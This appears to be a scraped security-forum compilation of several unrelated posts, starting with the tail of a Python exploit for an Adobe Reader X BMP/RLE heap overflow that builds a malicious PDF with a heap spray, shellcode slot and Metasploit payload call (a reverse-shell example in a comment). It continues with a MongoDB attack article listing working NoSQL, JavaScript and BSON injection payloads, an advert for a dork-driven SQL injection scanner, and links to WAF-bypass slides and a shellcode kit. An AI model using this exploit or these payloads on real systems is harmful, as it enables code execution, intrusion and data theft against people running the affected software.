util.pack(0x49494949); pointer_slide += util.pack(0x50505050); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0x90 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xa0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xb0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); //0xc0 pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0x46464646); pointer_slide += util.pack(0xCCCCCCCC); pointer_slide += util.packs("VirtualProtect"); //@0xCC pointer_slide += "\u0000"; pointer_slide += "KERNEL32"; pointer_slide += "\u0000"; pointer_slide += "%%SHELLCODE%%"; while (pointer_slide.length < 0x1000/2) pointer_slide += util.pack(0x41414141); pointer_slide = pointer_slide.substring(0,0x1000/2); util.message("Pointer slide size: " + pointer_slide.length); // And now ensure it gets bigger than 0x100000 bytes while (pointer_slide.length < 0x100000/2) pointer_slide += pointer_slide; // And the actual spray for (i=0; i < 100; i+=1) spray.pointers = pointer_slide.substring(16, 0x100000/2-16-2)+ util.pack(i) + ""; // Everything done here close the doc and // trigger the use of the vtable util.message("Now what?"); var pdfDoc = event.target; pdfDoc.closeDoc(true); </script> </event> </subform> <?originalXFAVersion http://www.xfa.org/schema/xfa-template/2.5/?> <?templateDesigner DefaultLanguage JavaScript?> <?templateDesigner DefaultRunAt client?> <?acrobat JavaScript strictScoping?> <?PDFPrintOptions embedViewerPrefs 0?> <?PDFPrintOptions embedPrintOnFormOpen 0?> <?PDFPrintOptions scalingPrefs 0?> <?PDFPrintOptions enforceScalingPrefs 0?> <?PDFPrintOptions paperSource 0?> <?PDFPrintOptions duplexMode 0?> <?templateDesigner DefaultPreviewType interactive?> <?templateDesigner DefaultPreviewPagination simplex?> <?templateDesigner XDPPreviewFormat 19?> <?templateDesigner DefaultCaptionFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> <?templateDesigner DefaultValueFontSettings face:Myriad Pro;size:10;weight:normal;style:normal?> <?templateDesigner Zoom 119?> <?templateDesigner FormTargetVersion 30?> <?templateDesigner SaveTaggedPDF 1?> <?templateDesigner SavePDFWithEmbeddedFonts 1?> <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?></template> <config xmlns="http://www.xfa.org/schema/xci/3.0/"> <agent name="designer"> <!-- [0..n] --> <destination>pdf</destination> <pdf> <!-- [0..n] --> <fontInfo/> </pdf> </agent> <present> <!-- [0..n] --> <pdf> <!-- [0..n] --> <version>1.7</version> <adobeExtensionLevel>5</adobeExtensionLevel> </pdf> <common/> <xdp> <packets>*</packets> </xdp> </present> </config> <localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.7/"> <locale name="en_US" desc="English (United States)"> <calendarSymbols name="gregorian"> <monthNames> <month>January</month> <month>February</month> <month>March</month> <month>April</month> <month>May</month> <month>June</month> <month>July</month> <month>August</month> <month>September</month> <month>October</month> <month>November</month> <month>December</month> </monthNames> <monthNames abbr="1"> <month>Jan</month> <month>Feb</month> <month>Mar</month> <month>Apr</month> <month>May</month> <month>Jun</month> <month>Jul</month> <month>Aug</month> <month>Sep</month> <month>Oct</month> <month>Nov</month> <month>Dec</month> </monthNames> <dayNames> <day>Sunday</day> <day>Monday</day> <day>Tuesday</day> <day>Wednesday</day> <day>Thursday</day> <day>Friday</day> <day>Saturday</day> </dayNames> <dayNames abbr="1"> <day>Sun</day> <day>Mon</day> <day>Tue</day> <day>Wed</day> <day>Thu</day> <day>Fri</day> <day>Sat</day> </dayNames> <meridiemNames> <meridiem>AM</meridiem> <meridiem>PM</meridiem> </meridiemNames> <eraNames> <era>BC</era> <era>AD</era> </eraNames> </calendarSymbols> <datePatterns> <datePattern name="full">EEEE, MMMM D, YYYY</datePattern> <datePattern name="long">MMMM D, YYYY</datePattern> <datePattern name="med">MMM D, YYYY</datePattern> <datePattern name="short">M/D/YY</datePattern> </datePatterns> <timePatterns> <timePattern name="full">h:MM:SS A Z</timePattern> <timePattern name="long">h:MM:SS A Z</timePattern> <timePattern name="med">h:MM:SS A</timePattern> <timePattern name="short">h:MM A</timePattern> </timePatterns> <dateTimeSymbols>GyMdkHmsSEDFwWahKzZ</dateTimeSymbols> <numberPatterns> <numberPattern name="numeric">z,zz9.zzz</numberPattern> <numberPattern name="currency">$z,zz9.99|($z,zz9.99)</numberPattern> <numberPattern name="percent">z,zz9%</numberPattern> </numberPatterns> <numberSymbols> <numberSymbol name="decimal">.</numberSymbol> <numberSymbol name="grouping">,</numberSymbol> <numberSymbol name="percent">%</numberSymbol> <numberSymbol name="minus">-</numberSymbol> <numberSymbol name="zero">0</numberSymbol> </numberSymbols> <currencySymbols> <currencySymbol name="symbol">$</currencySymbol> <currencySymbol name="isoname">USD</currencySymbol> <currencySymbol name="decimal">.</currencySymbol> </currencySymbols> <typefaces> <typeface name="Myriad Pro"/> <typeface name="Minion Pro"/> <typeface name="Courier Std"/> <typeface name="Adobe Pi Std"/> <typeface name="Adobe Hebrew"/> <typeface name="Adobe Arabic"/> <typeface name="Adobe Thai"/> <typeface name="Kozuka Gothic Pro-VI M"/> <typeface name="Kozuka Mincho Pro-VI R"/> <typeface name="Adobe Ming Std L"/> <typeface name="Adobe Song Std L"/> <typeface name="Adobe Myungjo Std M"/> </typefaces> </locale> <?originalXFAVersion http://www.xfa.org/schema/xfa-locale-set/2.1/?></localeSet> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data xfa:dataNode="dataGroup"/> </xfa:datasets> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.2-c001 63.139439, 2011/06/07-10:39:26 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description xmlns:xmp="http://ns.adobe.com/xap/1.0/" rdf:about=""> <xmp:MetadataDate>2012-11-23T13:41:54Z</xmp:MetadataDate> <xmp:CreatorTool>Adobe LiveCycle Designer ES 10.0</xmp:CreatorTool> <xmp:ModifyDate>2012-11-23T05:26:02-08:00</xmp:ModifyDate> <xmp:CreateDate>2012-11-23T05:15:47-08:00</xmp:CreateDate> </rdf:Description> <rdf:Description xmlns:pdf="http://ns.adobe.com/pdf/1.3/" rdf:about=""> <pdf:Producer>Adobe LiveCycle Designer ES 10.0</pdf:Producer> </rdf:Description> <rdf:Description xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" rdf:about=""> <xmpMM:DocumentID>uuid:0aa46f9b-2c50-42d4-ab0b-1a1015321da7</xmpMM:DocumentID> <xmpMM:InstanceID>uuid:86c66599-7238-4e9f-8fad-fe2cd922afb2</xmpMM:InstanceID> </rdf:Description> <rdf:Description xmlns:dc="http://purl.org/dc/elements/1.1/" rdf:about=""> <dc:format>application/pdf</dc:format> </rdf:Description> </rdf:RDF> </x:xmpmeta> <xfdf xmlns="http://ns.adobe.com/xfdf/" xml:space="preserve"> <annots/> </xfdf></xdp:xdp> ''' assert len(shellcode) <= 0xF00, "You need a smaller shellcode, sorry" #shellcode xdp = xdp.replace("%%SHELLCODE%%",UEncode(shellcode)) xdp = xdp.replace("%%SLIDESIZE%%", "0x%x"%SLIDESIZE); xdp = xdp.replace("%%MINICHUNKX%%",UEncode('O'*SLIDESIZE)) xdp = xdp.replace("%%BMPFREELFH%%",mkBMP('\x01\x00\x00\x00\x00\x00'+ chr(0x27)+'\x05',True).encode('base64')) #xdp = xdp.replace("%%BMPFREELFH%%",file("/usr/share/pixmaps/gnome-news.png","rb").read().encode('base64')) file("%s.log"%sys.argv[0].split('.')[0],'wb').write(xdp) #The document doc = PDFDoc() #font font = PDFDict() font.add("Name", PDFName("F1")) font.add("Subtype", PDFName("Type1")) font.add("BaseFont", PDFName("Helvetica")) #name:font map fontname = PDFDict() fontname.add("F1",font) #resources resources = PDFDict() resources.add("Font",fontname) #contents contentsDict = PDFDict() contents= PDFStream(contentsDict, '''BT /F1 24 Tf 100 100 Td (Pedefe Pedefeito Pedefeon!) Tj ET''') #page page = PDFDict() page.add("Type",PDFName("Page")) page.add("Resources",resources) page.add("Contents", PDFRef(contents)) #pages pages = PDFDict() pages.add("Type", PDFName("Pages")) pages.add("Kids", PDFArray([PDFRef(page)])) pages.add("Count", PDFNum(1)) #add parent reference in page page.add("Parent",PDFRef(pages)) xfa = PDFStream(PDFDict(), xdp) xfa.appendFilter(FlateDecode()) doc.add(xfa) #form form = PDFDict() form.add("XFA", PDFRef(xfa)) doc.add(form) #shellcode2 shellcode2 = PDFStream(PDFDict(), struct.pack("<L",0xcac0face)+"\xcc"*10) doc.add(shellcode2) #catalog catalog = PDFDict() catalog.add("Type", PDFName("Catalog")) catalog.add("Pages", PDFRef(pages)) catalog.add("NeedsRendering", "true") catalog.add("AcroForm", PDFRef(form)) adbe = PDFDict() adbe.add("BaseVersion","/1.7") adbe.add("ExtensionLevel",PDFNum(3)) extensions = PDFDict() extensions.add("ADBE", adbe) catalog.add("Extensions",extensions) doc.add([catalog,pages,page,contents]) doc.setRoot(catalog) #render it return doc.__str__() if __name__ == '__main__': import optparse,os from subprocess import Popen, PIPE parser = optparse.OptionParser(description='Adobe Reader X 10.1.4 XFA BMP RLE Exploit') parser.add_option('--debug', action='store_true', default=False, help='For debugging') parser.add_option('--msfpayload', metavar='MSFPAYLOAD', default="windows/messagebox ", help="Metasploit payload. Ex. 'win32_exec CMD=calc'") parser.add_option('--payload', metavar='PAYLOAD', default=None) parser.add_option('--doc', action='store_true', default=False, help='Print detailed documentation') (options, args) = parser.parse_args() if options.doc: print __doc__ os.exit(-1) if options.debug: print mkXFAPDF(), os.exit(-1) if options.payload == None: #"windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R" msfpayload = Popen("msfpayload4.4 %s R"%options.msfpayload, shell=True, stdout=PIPE) shellcode = msfpayload.communicate()[0] else: shellcode = file(options.payload, "rb").read() #options.hexpayload.decode('hex') print mkXFAPDF(shellcode), Sursa: https://github.com/feliam/CVE-2013-2729/blob/master/XFABMPExploit.py

Adobe Reader X BMP/RLE heap corruption Adobe Reader X is a powerful software solution developed by Adobe Systems to view, create, manipulate, print and manage les in Portable Document Format (PDF). Since version 10 it includes the Protected Mode, a sandbox technology similar to the one in Google Chrome which improves the overall security of the product. Adobe Reader X fails to validate the input when parsing an embedded BMP RLE encoded image. Arbitrary code execution in the context of the sandboxed process is proved possible after a malicious bmp image triggers a heap over ow. Download: http://t.co/ivC0BG33fh

[h=3]Attacking MongoDB[/h] I'm not going to describe the way a database is installed: developers make everything possible to ease this process even without using manuals. Let's focus on features that seem really interesting. The first thing is a REST interface. It is a web interface, which runs by default on port 28017 and allows an administrator to control their databases remotely via a browser. Working with this DBMS option, I found several vulnerabilities: two stored XSS vulnerabilities, undocumented SSJS (Server Side Java Script) code execution, and multiple CSRF. I'm going to detail the above mentioned vulnerabilities. The fields Clients and Log have two stored XSS vulnerabilities. It means that making any request with HTML code to the database, this code will be written to the source code of the page of the REST interface and will be executed in a browser of a person, who will visit this page. These vulnerabilities make the following attack possible: Send a request with the tag SCRIPT and JS address. An administrator opens the web interface in a browser, and the JS code gets executed in this browser. Request command execution from the remote server via the JSONP script. The script performs the command using undocumented SSJS code execution. The result is sent to our remote host, where it is written to a log. As to undocumented SSJS code execution, I've written a template, which can be modified as may seem necessary. http://vuln-host:28017/admin/$cmd/?filter_eval=function(){ return db.version() }&limit=1 It is well known that it is necessary to have a driver, which will serve as transport, to work with any significant database written in a script language, for instance PHP. I decided to take a close look at these drivers for MongoDB and chose a driver for PHP. Suppose there is a completely configured server with Apache+PHP+MongoDB and a vulnerable script. The main fragments of this script are as follows: $q = array("name" => $_GET['login'], "password" => $_GET['password']); $cursor = $collection->findOne($q); The script makes a request to the MongoDB database when the data has been received. If the data is correct, then it receives an array with the user's data output. It looks as follows: echo 'Name: ' . $cursor['name']; echo 'Password: ' . $cursor['password']; Suppose the following parameters have been sent to it (True): ?login=admin&password=pa77w0rd Then the request to the database will look as follows: db.items.findOne({"name" :"admin", "password" : "pa77w0rd"}) Due to the fact that the database contains the user admin with the password pa77w0rd, then its data is output as a response (True). If another name or password is used, then the response will return nothing (False). There are conditions in MongoDB similar to the common where except for few differences in syntax. Thus it is necessary to write the following to output records, which names are not admin, from the table items: db.items.find({"name" :{$ne : "admin"}}) PHP only requires another array to put it into the other one, which is sent by the function findOne. Let's proceed from theory to practice. At first, create a request, which sample will comply with the following conditions: password is not 1 and user is admin. db.items.findOne({"name" :"admin", "password" : {$ne : "1"}}) It will look as follows in PHP: $q = array("name" => "admin", "password" => array("\$ne" => "1")); It is only needed to declare the variable password as an array for exploitation: ?login=admin&password[$ne]=1 Consequently, the admin data is output (True). This problem can be solved by the function is_array() and by bringing input arguments to the string type. Another vulnerability typical of MongoDB and PHP if used together is related to injection of your data to a SSJS request made to a server. I'll use code to exemplify it. Assume that INSERT looks as follows: $q = "function() { var loginn = '$login'; var passs = '$pass'; db.members.insert({id : 2, login : loginn, pass : passs}); }"; An important condition is that the variables $pass and $login are taken directly from the array $_GET and are not filtered (yes, it's an obvious fail, but it's very common): Send test data: ?login=user&password=password Receive the following data in response: Your login:user Your password:password Let's try to exploit the vulnerability, which presupposes that data sent to a parameter is not filtered or verified. Rewrite loginn variable: ?login=user&password=1'; var loginn = db.version(); var b=' The first thing we want is to read other records. A simple request is at help: /?login=user&password= '; var loginn = tojson(db.members.find()[0]); var b='2 Of course, it may happen that there will be no output, then it will be needed to use a time-based technique, which is based on a server response delay depending on a condition (true/false), to receive data. Here is an example: ?login=user&password='; if (db.version() > "2") { sleep(10000); exit; } var loginn =1; var b='2 It is well known that MongoDB allows creating users for a specific database. Information about users in databases is stored in the table db.system.users. We are mostly interested in the fields user and pwd of the above mentioned table. The user column contains a user login, pwd - MD5 string ?%login%:mongo:%password%?, where login and password are the login and hash of the login, key, and user password. All data is transferred unencrypted and packet hijacking allows obtaining specific data necessary to receive user's name and password. It is needed to hijack nonce, login, and key sent by a client when authorizing on the MongoDB server. Key contains an MD5 string of the following form: ”%nonce% + %login% + md5(%login% + ":mongo:" + %passwod%)”. Let's move further and consider another type of vulnerabilities based on wrong parsing of a BSON object transferred in a request to a database. A few words about BSON at first. BSON (Binary JavaScript Object Notation) is a computer data interchange format used mainly as a storage of various data (Bool, int, string, and etc.). Assume there is a table with two records: > db.test.find({}) { "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "admin", "isadmin" : true } { "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "noadmin", "isadmin" : false } And a database request, which can be injected: >db.test.insert({ "name" : "noadmin2", "isadmin" : false}) Just insert a crafted BSON object to the column name: >db.test.insert({ "name\x16\x00\x08isadmin\x00\x01\x00\x00\x00\x00\x00" : "noadmin2", "isadmin" : false}) 0x08 before isadmin specifies that the data type is boolean and 0x01 sets the object value as true instead of false assigned by default. The point is that, dealing with variable types, it is possible to rewrite data rendered automatically with a request. Now let's see what there is in the table: > db.test.find({}) { "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "admin", "isadmin" : true } { "_id" : ObjectId("5044ebc3a91b02e9a9b065e1"), "name" : "noadmin", "isadmin" : false } { "_id" : ObjectId("5044ebf6a91b02e9a9b065e3"), "name" : null, "isadmin" : true, "isadmin" : true } False has been successfully changed into true! Let's consider a vulnerability in the BSON parser, which allows reading arbitrary storage areas. Due to incorrect parsing of the length of a BSON document in the column name in the insert command, MongoDB makes it possible to insert a record that will contain a Base64 encrypted storage area of the database server. Suppose we have a table named dropme and enough privileges to write in it. > db.dropme.insert({"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}) > db.dropme.find() { "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkAOQAsAC...........................ACkALAAgACIAFg==") } It happens because the length of the BSON object is incorrect - 0x010 instead of 0x01. When Base64 code is decrypted, we receive bytes of random server storage areas. ?????: Positive Research Sursa: http://blog.ptsecurity.com/2012/11/attacking-mongodb_26.html

SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool SQL Poizon v1.1 – SQLi Exploit Scanner, Search Hunter, Injection Builder Tool is a tool which scans website through dorks automatically and finds vulnerabilities in them its very easy powerful too, to find vulnerable site of any country . New Features : “Look &Feel” is more attractive now. Rich “Context Menu” items. “Results” contain checkboxes to enable selection. “Selected Dork” box is editable now for user convenience. Built-in Browser for “Injection Builder” to check the impact of injection. “Text Bucket” available for “Injection Builder” to save extra data. “Insert Order By” button is added to “Injection Builder”. “Internet Browser” with Snapshot and HTML DOM Tree. Bug Fixes : It wont get stucked after pressing the stop button. Just a minor wait can occur which is okay. Progress bar for “Crawler” has been fixed. It will show correct progress now. Error on importing file is fixed now. You can import files from other directories as well. “Searchqu” shows invalid results. It is fixed now. Download : Sql Poizon v1.1 – Sqli Exploit Scanner,Injection Builder Tool password : racun Virus Scan 1 | Virus scan 2 Make sure “Run As Administrator” Sursa: SQL Poizon v1.1 - SQLi Exploit Scanner, Search Hunter, Injection Builder Tool | Rianul WP Blog

[h=1]Lie to Me: Bypassing Modern Web Application Firewalls[/h] [h=2]by Vladimir Vorontsov on May 26, 2013[/h] The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms. Slides: http://www.slideshare.net/d0znpp/lie-tomephd2013

Shellcodecs Shellcoding Toolset Site blackhatlibrary.net Shellcodecs is a collection of shellcodes, loaders, sources, and generators provided with documentation designed to ease the exploitation and shellcode programming process. Download: http://packetstormsecurity.com/files/download/121852/shellcodecs.tar.gz Sursa: Shellcodecs Shellcoding Toolset ? Packet Storm